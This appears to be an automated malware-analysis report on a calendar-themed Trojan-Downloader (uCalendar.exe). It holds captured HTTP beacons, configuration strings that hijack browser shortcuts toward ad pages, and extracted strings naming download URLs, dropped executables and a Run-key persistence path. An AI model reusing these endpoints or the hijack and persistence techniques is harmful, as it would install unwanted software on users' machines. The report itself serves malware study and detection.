t    Explorer.lnk,Internet Explarcrs,lnk,Internet Exp1orer,lnk,Interne
t Explorer.lnk,Intermet hao123cs.lnk,1ntermet hao123rl.lnk, Intener Ha
o123,lnk,360...... 3600.lnk,Intotnot  ExpIerer,Intornet   HaoI123,1nto
rnet .HaoI123.,Internet ExpIorer.exe,Intornet HaoI123.lnk,1ntomret _ha
o.123.lnk,....123.lnk,....123.........lnk,Internet Expiorer.lnk,......
...........lnk," IENAV_shell_changeurl = "hXXp://hao.360.cn/?src=lm&ls
=n162f37fb94" IENAV_shell_dellist = ""..></item>..<item ti
d="1" name="Internet Exploror" Ads_Url="hXXp://VVV.315619.com/?a01
<<< skipped >>>


GET /9.gif?abc=1&rnd=1658784305 HTTP/1.1
Accept: */*
Referer: hXXp://update.xiaoxinrili.com/tj.html?%original file name%.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cnzz.mmstat.com
Connection: Keep-Alive


HTTP/1.1 302 Found
Server: Tengine
Date: Wed, 14 Jan 2015 11:51:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=RkY9DbJslnYCAcGK9OdJn7XJ; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.mmstat.com
Set-Cookie: sca=e1a96173; path=/; domain=.cnzz.mmstat.com
Set-Cookie: atpsida=6b6110718aa3354e88624c9e_1421236294; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.cnzz.mmstat.com
Location: hXXp://pcookie.cnzz.com/app.gif?&cna=RkY9DbJslnYCAcGK9OdJn7XJ
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 302 Found..Server:
 Tengine..Date: Wed, 14 Jan 2015 11:51:34 GMT..Content-Type: image/gif
..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CUR
a ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=RkY9DbJsln
YCAcGK9OdJn7XJ; expires=Sat, 11-Jan-25 11:51:34 GMT; path=/; domain=.m
mstat.com..Set-Cookie: sca=e1a96173; path=/; domain=.cnzz.mmstat.com..
Set-Cookie: atpsida=6b6110718aa3354e88624c9e_1421236294; expires=Sat, 
11-Jan-25 11:51:34 GMT; path=/; domain=.cnzz.mmstat.com..Location: htt
p://pcookie.cnzz.com/app.gif?&cna=RkY9DbJslnYCAcGK9OdJn7XJ..Expires: T
hu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cach
e..GIF89a.............!.......,...........L..;....



GET /?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json HTTP/1.1
User-Agent: MERONG(0.9/;p)
Accept: */*
Host: k780.xiaoxinrili.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 14 Jan 2015 11:49:49 GMT
Content-Type: application/json; charset=utf-8;
Content-Length: 3359
Connection: keep-alive
X-Cache-CFC: HIT -  - httpGETk780.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json
{"success":"1","result":[{"weaid":"1","days":"2015-01-14","week":"....
.....","cityno":"beijing","citynm":"......","cityid":"101010100","temp
erature":"2.../-5...","humidity":"0.../0...","weather":"............",
"weather_icon":"hXXp://api.k780.com:88/upload/weather/d/14.gif","weath
er_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"...
............","winp":"......","temp_high":"2","temp_low":"-5","humi_hi
gh":"0","humi_low":"0","weatid":"15","weatid1":"33","windid":"124","wi
npid":"125"},{"weaid":"1","days":"2015-01-15","week":".........","city
no":"beijing","citynm":"......","cityid":"101010100","temperature":"3.
../-3...","humidity":"0.../0...","weather":"...","weather_icon":"http:
//api.k780.com:88/upload/weather/d/53.gif","weather_icon1":"hXXp://api
.k780.com:88/upload/weather/n/53.gif","wind":"........................
","winp":".........3-4...","temp_high":"3","temp_low":"-3","humi_high"
:"0","humi_low":"0","weatid":"33","weatid1":"33","windid":"145","winpi
d":"131"},{"weaid":"1","days":"2015-01-16","week":".........","cityno"
:"beijing","citynm":"......","cityid":"101010100","temperature":"5.../
-6...","humidity":"0.../0...","weather":"............","weather_icon":
"hXXp://api.k780.com:88/upload/weather/d/1.gif","weather_icon1":"http:
//api.k780.com:88/upload/weather/n/0.gif","wind":"......","winp":"4-5.
.....3-4...","temp_high":"5","temp_low":"-6","humi_high":"0","humi_low
":"0","weatid":"2","weatid1":"1","windid":"20","winpid":"54"},{"weaid"
:"1","days":"2015-01-17","week":".........","cityno":"beijing","ci
<<< skipped >>>

GET /?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json HTTP/1.1


User-Agent: MERONG(0.9/;p)
Accept: */*
Host: k780.xiaoxinrili.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Wed, 14 Jan 2015 11:49:52 GMT
Content-Type: application/json; charset=utf-8;
Content-Length: 3359
Connection: keep-alive
X-Cache-CFC: HIT -  - httpGETk780.xiaoxinrili.com/?app=weather.future&weaid=1&appkey=12154&sign=1b5d950e15ba193e96405dd75be5ab1f&format=json
{"success":"1","result":[{"weaid":"1","days":"2015-01-14","week":"....
.....","cityno":"beijing","citynm":"......","cityid":"101010100","temp
erature":"2.../-5...","humidity":"0.../0...","weather":"............",
"weather_icon":"hXXp://api.k780.com:88/upload/weather/d/14.gif","weath
er_icon1":"hXXp://api.k780.com:88/upload/weather/n/53.gif","wind":"...
............","winp":"......","temp_high":"2","temp_low":"-5","humi_hi
gh":"0","humi_low":"0","weatid":"15","weatid1":"33","windid":"124","wi
npid":"125"},{"weaid":"1","days":"2015-01-15","week":".........","city
no":"beijing","citynm":"......","cityid":"101010100","temperature":"3.
../-3...","humidity":"0.../0...","weather":"...","weather_icon":"http:
//api.k780.com:88/upload/weather/d/53.gif","weather_icon1":"hXXp://api
.k780.com:88/upload/weather/n/53.gif","wind":"........................
","winp":".........3-4...","temp_high":"3","temp_low":"-3","humi_high"
:"0","humi_low":"0","weatid":"33","weatid1":"33","windid":"145","winpi
d":"131"},{"weaid":"1","days":"2015-01-16","week":".........","cityno"
:"beijing","citynm":"......","cityid":"101010100","temperature":"5.../
-6...","humidity":"0.../0...","weather":"............","weather_icon":
"hXXp://api.k780.com:88/upload/weather/d/1.gif","weather_icon1":"http:
//api.k780.com:88/upload/weather/n/0.gif","wind":"......","winp":"4-5.
.....3-4...","temp_high":"5","temp_low":"-6","humi_high":"0","humi_low
":"0","weatid":"2","weatid1":"1","windid":"20","winpid":"54"},{"weaid"
:"1","days":"2015-01-17","week":".........","cityno":"beijing","ci
<<< skipped >>>


GET /stat.htm?id=1253322244&r=&lg=en-us&ntime=none&cnzz_eid=307117902-1421236297-&showp=1276x846&t=&h=1&rnd=31178880 HTTP/1.1
Accept: */*
Referer: hXXp://down.xiaoxinrili.com/hezi/xxurl.html?iexplore.exe
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: z9.cnzz.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: Tengine/1.4.1
Date: Wed, 14 Jan 2015 11:51:38 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Tue, 28 May 2013 02:57:17 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..



GET /daohang/xttj.html?%original file name%.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Mon, 25 Aug 2014 06:09:09 GMT
Accept-Ranges: bytes
ETag: "d81386152bc0cf1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:20 GMT
Content-Length: 585
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?"...Ey..'..y6;z|.....jv.....Vm..
..>...........t.......n.f.x5_........>.wo..^......QZf..uv....w..
.5C.....^/.........OSK......N........Ve.Y....4.>J?.,.U.."_....fmQ-.
.....H?J......../.q...wU.m..^..4[.[....Nf.eJ...{.0..bZ-..{;;...}....~.
.Z..f..`............]9.MA.....b...{j ..{....c....:.../...;w.#Dt.v.~$ {
.el..D..n..&.....q....to......?........Y:..s....J..=...qV_..g....B.-A*
..iV.'....}...{H?.......?.....?..................a.5....5 j.^.4.IU....
.Z...wi4.....7NhTw...e....F)_.....HTTP/1.1 200 OK..Content-Type: text/
html..Content-Encoding: gzip..Last-Modified: Mon, 25 Aug 2014 06:09:09
 GMT..Accept-Ranges: bytes..ETag: "d81386152bc0cf1:0"..Vary: Accept-En
coding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Wed, 1
4 Jan 2015 11:53:20 GMT..Content-Length: 585...............`.I.%&/m.{.
J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..
J...!....?~|.?"...Ey..'..y6;z|.....jv.....Vm....>...........t......
.n.f.x5_........>.wo..^......QZf..uv....w...5C.....^/.........OSK..
....N........Ve.Y....4.>J?.,.U.."_....fmQ-......H?J......../.q...wU
.m..^..4[.[....Nf.eJ...{.0..bZ-..{;;...}....~..Z..f..`............]9.M
A.....b...{j ..{....c....:.../...;w.#Dt.v.~$ {.el..D..n..&.....q....to
......?........Y:..s....J..=...qV_..g....B.-A*..iV.'....}...{H?.......
?.....?..................a.5....5 j.^.4.IU.....Z...wi4.....7NhTw...e..
..F)_.........
<<< skipped >>>

GET /tj/a1.html?%original file name%.exe&type=silent&hp=00&al=Lnk_Hao123_1|Lnk_ahxy_1&errno= HTTP/1.1


Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: update.xiaoxinrili.com
Connection: Keep-Alive
Cookie: CNZZDATA5467330=cnzz_eid=1312808906-1421232890-&ntime=1421232890; CNZZDATA30085361=cnzz_eid=162298059-1421232891-&ntime=1421232891; AJSTAT_ok_pages=1; AJSTAT_ok_times=1


HTTP/1.1 200 OK
Content-Type: text/html
Content-Encoding: gzip
Last-Modified: Thu, 25 Jul 2013 08:30:48 GMT
Accept-Ranges: bytes
ETag: "51fbc6431189ce1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 14 Jan 2015 11:53:29 GMT
Content-Length: 202
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{
....{....;.N'...?\fd.l..J...!....?~|.?".7..X.iSO?.h...Gw.6......?.O...
....j..=..g......../..'..........."....d..k...........x.&"d...HTTP/1.1
 200 OK..Content-Type: text/html..Content-Encoding: gzip..Last-Modifie
d: Thu, 25 Jul 2013 08:30:48 GMT..Accept-Ranges: bytes..ETag: "51fbc64
31189ce1:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Power
ed-By: ASP.NET..Date: Wed, 14 Jan 2015 11:53:29 GMT..Content-Length: 2
02...............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@...
...{....{....;.N'...?\fd.l..J...!....?~|.?".7..X.iSO?.h...Gw.6......?.
O.......j..=..g......../..'..........."....d..k...........x.&"d.....

The Trojan-Downloader connects to the servers at the folowing location(s):

uCalendar.exe_1840:

.text
`.rdata
@.data
.rsrc
@.reloc
t.jPhm
tGHt.Ht&
CNotSupportedException
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
kernel32.dll
%s%s.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
commctrl_DragListMsg
CCmdTarget
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
mfcm90.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
user32.dll
ole32.dll
Visual C   CRT: Not enough memory to complete call to strerror.
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
USER32.DLL
OLEACC.dll
X-
3.6.23.1
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY0
%s%d bytes
No start tag for end tag '%s' at offset %d
End tag '%s' at offset %d does not match start tag '%s' at offset %d
Element '%s' at offset %d not ended
%s at offset %d unterminated
Incorrect %s at offset %d
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: %d
Content-Disposition: form-data; name="%s"
Content-Disposition: form-data; name="%s"; filename="%s"
Content-Type: %s
https
hXXp://update.xiaoxinrili.com/FMTFilter.txt
hXXp://update.xiaoxinrili.com/FMTFilterinset.txt
Microsoft Windows NT 4.0
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 R2
Microsoft Windows Vista
Microsoft Windows Server 2008
Microsoft Windows 7
Microsoft Windows Server 2008 R2
Chrome_WidgetWin_1
16777215
-2147483630
Software\Microsoft\Windows\CurrentVersion\Run
data\Install.ini
huangli.xml
wdj_connection_wrapper.dll
/wdj_connection_wrapper.dll
hXXp://VVV.baidu.com
hXXp://k780.xiaoxinrili.com/?app=weather.future&weaid=[ID]&appkey=[skey]&sign=[sign]&format=json
[skey]
Weather_none.png
Replace.dll
uCalExternal.exe
%d:%d
Temper%d.png
Temper-.png
hXXp://VVV.xiaoxinrili.com/
hXXp://update.xiaoxinrili.com/htmlinset1.txt
hXXp://update.xiaoxinrili.com/PopBoxSmall.txt
hXXp://update.xiaoxinrili.com/PopBoxBig.txt
hXXp://update.xiaoxinrili.com/Version.txt
hXXp://count.xiaoxinrili.com/startup?appname=5bCP5paw5pel5Y6G&version=4.0&sid=[mac]&pos=[way]&s=[macmd5]
hXXp://count.xiaoxinrili.com/startup?appname=cmlsaXF1aWNrZW4=&version=4.0&sid=[mac]&pos=[way]&s=[macmd5]
hXXp://update.xiaoxinrili.com/appImg/appimg.txt
hXXp://update.xiaoxinrili.com/appImg/AppCloud4.2.xml
hXXp://update.xiaoxinrili.com/update.txt
hXXp://update.xiaoxinrili.com/Install.txt
update.xiaoxinrili.com
hXXp://update.xiaoxinrili.com/md5.txt
hXXp://update.xiaoxinrili.com/uCalhtml.txt
hXXp://update.xiaoxinrili.com/weather.txt
/html.exe
/inst.exe
/tmp.exe
/riliUpdate.exe
hXXp://7day.xiaoxinrili.com/city
hXXp://m.weather.com.cn/data/
hXXp://VVV.weather.com.cn/data/sk/
hXXp://7day.xiaoxinrili.com/v2
20151007
sysexe
dlurl
?skq=%d
bkimage="beiwanglubj.png" inset="0,0,0,0"
.png' dest='4,4,59,59'"
file='sky_aero.png' corner='40,8,8,8'
riliUpdate.exe
riliquicken.exe
uCalHtml.exe
tmp.exe
inst.exe
html.exe
uiconfig.txt
update.exe
data\weather.dat
data\Config.ini
niaojiao.wav
note.db3
%ddd|
jintian3.png
%d/d/d
%s(%s)
dd
hXXp://VVV.vckbase.com/index.php/video/listview/fid/1/sid/4
xtest.xml
http\shell\open\command
AppCloud.xml
M-d-d
delete from tasklist where idkey='%s';
S_11.png
S_22.png
jj.png
update tasklist set stitle= '%s', sdata='%s', warn_ri='%s', sWritetime='%s', warn_time='%s', weekwarn='%s', warn_mode='%d', warn_type='%d', is_warn='%d', warn_day='%d' where idkey=%d;
%d-d-d
idkey
.png"
jj.png"
float="true" pos="240,10,260,30" bkimage="file='del.png'" tooltip="
M-d-d d:d:d
select max(idkey) AS maxId from tasklist
create table tasklist (idkey integer primary key, stitle , sdata , warn_ri, sWritetime, warn_time,
insert into tasklist values(NULL, '%s', '%s', '%s', '%s', '%s', '%s','%d','%d','%d','%d');
d:d:d
xweatherInfo.xml
ie.xml
hXXp://update.xiaoxinrili.com/tj.html?
hXXp://update.xiaoxinrili.com/qian.html
hXXp://update.xiaoxinrili.com/shan.html
hXXp://update.xiaoxinrili.com/daohang/jsq/tj.html?
[macmd5]
hXXp://update.xiaoxinrili.com/qian.html?
hXXp://down.xiaoxinrili.com/hezi/xxurl.html?
file='menu_bk.png' corner='40,8,8,8'
Festival.xml
infoMenu.xml
tclock.ini
UILoginFrame
tray_xp_yes.png
tray_xp_no.png
tray_yes.png
tray_no.png
rundll32.exe /d shell32.dll,Control_RunDLL timedate.cpl
xSetInfo.xml
d:d
d:d
d-d-d
132.163.4.101
hl.xml
InputBox.xml
xwarnTip.xml
msgwnd.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)
shutdown.xml
xShutdown.xml
xjiaqi.xml
pointwnd2.xml
360ProgressF.png
1.png
apptool.xml
pos="44, 3, 58, 19" float="true" bkimage="delapp2.png" hotimage="delapp1.png"
_del.png" hotimage="
del.png"
_f1.png" selectedimage="
_f2.png" group="asa1" selected="true"
_f2.png" group="asa1"
pos="43, 0, 68, 25" float="true" bkimage="addapp.png" hotimage="addapph.png"
1.png" hotimage="
2.png"
2.png
addapph.png
addapp.png
hXXp://update.xiaoxinrili.com/daohang/tc/
iebox.xml
xTipLayer11.xml
xTipLayer.xml
hXXp://update.xiaoxinrili.com/tc/youxiajiao.html
xminiTip.xml
mobileTip.xml
pointwnd0.xml
hXXp://
hXXp://update.xiaoxinrili.com/tc/fmt.html
xieminiTip.xml
Setwnd.xml
e:\duilib\bin\uCalendar.pdb
GetCPInfo
GetConsoleOutputCP
GetProcessHeap
KERNEL32.dll
ExitWindowsEx
UnhookWindowsHookEx
GetKeyState
SetWindowsHookExA
CreateDialogIndirectParamA
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
COMDLG32.dll
WINSPOOL.DRV
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyA
RegOpenKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
oledlg.dll
OLEAUT32.dll
URLDownloadToFileA
urlmon.dll
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD0@Z
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?SetWebBrowserEventHandler@CWebBrowserUI@DuiLib@@QAEXPAVCWebBrowserEventHandler@2@@Z
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?Refresh@CWebBrowserUI@DuiLib@@QAEXXZ
ui_d.dll
InternetOpenUrlA
HttpQueryInfoA
HttpOpenRequestA
HttpSendRequestA
HttpAddRequestHeadersA
HttpSendRequestExA
HttpEndRequestA
WININET.dll
DesktopCalendar.dll
WINMM.dll
UxTheme.dll
IPHLPAPI.DLL
WS2_32.dll
.PAVCOleException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCFileException@@
.PAVCOleDispatchException@@
%u\j%u\
zcÁ
.?AVCCmdTarget@@
SQLITE_
d-d-d d:d:d
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
922337203685477580
API call with %s database connection pointer
RowKey
%s\etilqs_
OsError 0x%x (%u)
invalid page number %d
2nd reference to page %d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
failed to get page %d
freelist leaf count too big on page %d
Page %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On page %d at right child:
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
unknown database %s
keyinfo(%d
%s(%d)
%s-mjX
foreign key constraint failed
attempt to step a halted statement: [%s]
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
zeroblob(%d)
abort at %d in [%s]: %s
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
no such savepoint: %s
cannot %s savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
database table is locked: %s
statement aborts at %d: [%s] %s
cannot open virtual table: %s
cannot open view: %s
no such column: "%s"
foreign key
indexed
cannot open %s column for writing
cannot open value of type %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s
%s: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
too many SQL variables
too many columns in %s
misuse of aggregate: %s()
%.*s"%w"%s
%s%.*s"%w"
sqlite_rename_table
sqlite_rename_trigger
sqlite_rename_parent
%s OR name=%Q
there is already another table or index with this name: %s
sqlite_
table %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_stat1
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE tbl=%Q
SELECT idx, stat FROM %Q.sqlite_stat1
invalid name: "%s"
too many attached databases - max %d
database %s is already in use
unable to open database: %s
no such database: %s
cannot detach database %s
database %s is locked
sqlite_detach
sqlite_attach
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
there is already an index named %s
too many columns on %s
duplicate column name: %s
default value of column [%s] is not constant
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
DELETE FROM %s.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
indexed columns are not unique
table %s may not be indexed
views may not be indexed
virtual tables may not be indexed
there is already a table named %s
index %s already exists
sqlite_autoindex_%s_%d
table %s has no column named %s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q
DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q
a JOIN clause is required before %s
unable to identify the object to be reindexed
table %s may not be modified
cannot modify %s because it is a view
sqlite_version
sqlite_source_id
sqlite_compileoption_used
sqlite_compileoption_get
foreign key mismatch
table %S has %d columns but %d values were supplied
%d values for %d columns
table %S has no column named %s
%s.%s may not be NULL
PRIMARY KEY must be unique
sqlite3_extension_init
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
automatic extension loading failed: %s
foreign_keys
foreign_key_list
*** in database %s ***
unsupported encoding: %s
malformed database schema (%s)
%s - %s
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
%s.%s
%s:%d
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
sqlite_subquery_%p_
no such table: %s
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
-- TRIGGER %s
no such column: %s
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor did not declare schema: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
at most %d tables in a join
cannot use index: %s
TABLE %s
%s AS %s
%s WITH INDEX %s
%s VIA MULTI-INDEX UNION
%s USING PRIMARY KEY
%s VIRTUAL TABLE INDEX %d:%s
%s ORDER BY
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
SQL logic error or missing database
large file support is disabled
no such vfs: %s
database corruption found by source line %d
misuse detected by source line %d
cannot open file at source line %d
.?AVCWebBrowserEventHandler@DuiLib@@
.?AVCWebBHandler@@
.?AVCMsgWnd@@
.?AVCWebIEHandlerpop@@
.?AVCWebBHandlerpop@@
.?AVCWebBHandler1@@
.?AVGenericHTTPClient@@
